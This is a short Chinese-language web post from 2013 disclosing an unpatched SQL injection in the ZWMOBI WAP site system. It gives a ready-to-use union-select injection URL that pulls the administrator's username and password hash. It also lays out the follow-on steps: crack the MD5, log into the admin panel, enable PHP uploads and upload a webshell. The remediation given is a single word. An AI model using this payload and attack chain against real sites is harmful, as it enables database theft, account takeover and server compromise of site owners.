当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

ZWMOBI wap建站系统注入及修复

时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

0Day说明:变量过滤不严,导致MYSQL注入发生。

 

漏洞利用:zwmobi.php?zwmobi=bbsview&V=21&cid=12/**/union/**/select/**/1,1,1,1,username,password,1,1,1,1/**/from/**/表前缀_member/**/where/**/uid=1

 搜狗电脑知识网

其中uid就是用户的uid,因为默认管理uid是1.表前缀请替换为实际的表前缀,默认是zwmobi,可以通过在 cid=12后面加一个单引号爆出。

 

 

修复:过滤

 

官方补丁:尚未发布

 

爆出来的MD5密码拿去破解,破解了在 admin_index.php登录,在后台配置的地方加个php类型的上传。然后点系统模块,软件管理,添加软件,传马

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1